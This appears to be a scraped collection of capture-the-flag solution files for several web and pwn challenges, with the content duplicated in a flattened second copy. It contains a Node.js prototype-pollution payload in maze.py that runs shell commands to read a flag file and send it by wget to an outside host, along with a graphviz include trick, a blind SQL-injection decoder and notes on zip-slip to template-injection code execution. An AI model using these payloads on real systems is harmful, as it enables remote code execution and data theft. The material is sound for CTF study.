po6ix/graphviz++

## graphviz++
digraph g1 {
  subgraph cluster_0 {
    style=filled;
    color=lightgrey;
    node [style=filled, color=white];
    a0 -> a1 -> a2 -> a3;
  }
  start -> a0;
  a3 -> end;
  a1 -> b3;
  a3 -> a0;
"
include(`flag_foxtrot.txt')
";
  start [shape=doublecircle];
  end [shape=doublecircle];
}

## justsqli.md

      
    Raw
  

              justsqli.md
            
          
    sqlite> select 1 union values (4);
1
4

you can use values alternatively

  
## limited.py
import glob, re
import urllib.parse

stack = [[] for _ in range(51)]
files = glob.glob('http/*')

for name in files:
    query = urllib.parse.unquote(name).replace('+', ' ')
    index = int(query[query.index('(secret, ') + 9:query.index('FROM') - 6])
    mod = int(query.split('%')[1])

    f = open(name)
    content = f.read()
    f.close()

    try:
        stack[index].append((mod, int(max([int(c) for c in re.findall(r'<th scope="row">([\d]+)</th>', content)]))))
    except Exception as e:
        stack[index].append((mod, 0))

r = ''

for i in range(1, len(stack)):
    aplitude = set([i for i in range(128)])

    for tup in stack[i]:
        for j in range(128):
            if j % tup[0] != tup[1]:
                if j in aplitude:
                    aplitude.remove(j)

    r += chr(list(aplitude)[0])

print(r)

## maze.py
import requests
import json

# HOST = 'localhost'm
HOST = 'web.kosenctf.com'
PORT = 14002

data = '''{"map":[[0,0,0]],"start":{"0":2,"1":0,"__proto__":{"__proto__":{"heap":"BinaryHeap|console.log(process.mainModule.require('child_process').execSync(`wget \\"http://p6.is?$(cat /flag-b1987621d8c3e66b3003f272e43252c6.txt|base64 | tr '\\\\n' :)\\"`).toString())//"}}},"goal":{"0":0,"1":0},"heap":null}'''

r = requests.post(f"http://{HOST}:{PORT}/solve",
                  headers = {"Content-Type": "application/json"},
                  data = data)
print(r.text)

## miniblog.md

      
    Raw
  

              miniblog.md
            
          
tar.gz zipslip
overwrite ../template
ssti -> rce


## pash.md

      
    Raw
  

              pash.md
            
          
    mkdir /tmp/posix
cd /tmp/posix
ln -s xxxx.txt /home/pwn/flag.txt
/home/pwn/pash
-> try to read flag.txt
	digraph g1 {
	subgraph cluster_0 {
	style=filled;
	color=lightgrey;
	node [style=filled, color=white];
	a0 -> a1 -> a2 -> a3;
	}
	start -> a0;
	a3 -> end;
	a1 -> b3;
	a3 -> a0;
	"
	include(`flag_foxtrot.txt')
	";
	start [shape=doublecircle];
	end [shape=doublecircle];
	}
	import glob, re
	import urllib.parse

	stack = [[] for _ in range(51)]
	files = glob.glob('http/*')

	for name in files:
	query = urllib.parse.unquote(name).replace('+', ' ')
	index = int(query[query.index('(secret, ') + 9:query.index('FROM') - 6])
	mod = int(query.split('%')[1])

	f = open(name)
	content = f.read()
	f.close()

	try:
	stack[index].append((mod, int(max([int(c) for c in re.findall(r'<th scope="row">([\d]+)</th>', content)]))))
	except Exception as e:
	stack[index].append((mod, 0))

	r = ''

	for i in range(1, len(stack)):
	aplitude = set([i for i in range(128)])

	for tup in stack[i]:
	for j in range(128):
	if j % tup[0] != tup[1]:
	if j in aplitude:
	aplitude.remove(j)

	r += chr(list(aplitude)[0])

	print(r)
	import requests
	import json

	# HOST = 'localhost'm
	HOST = 'web.kosenctf.com'
	PORT = 14002

	data = '''{"map":[[0,0,0]],"start":{"0":2,"1":0,"__proto__":{"__proto__":{"heap":"BinaryHeap\|console.log(process.mainModule.require('child_process').execSync(`wget \\"http://p6.is?$(cat /flag-b1987621d8c3e66b3003f272e43252c6.txt\|base64 \| tr '\\\\n' :)\\"`).toString())//"}}},"goal":{"0":0,"1":0},"heap":null}'''

	r = requests.post(f"http://{HOST}:{PORT}/solve",
	headers = {"Content-Type": "application/json"},
	data = data)
	print(r.text)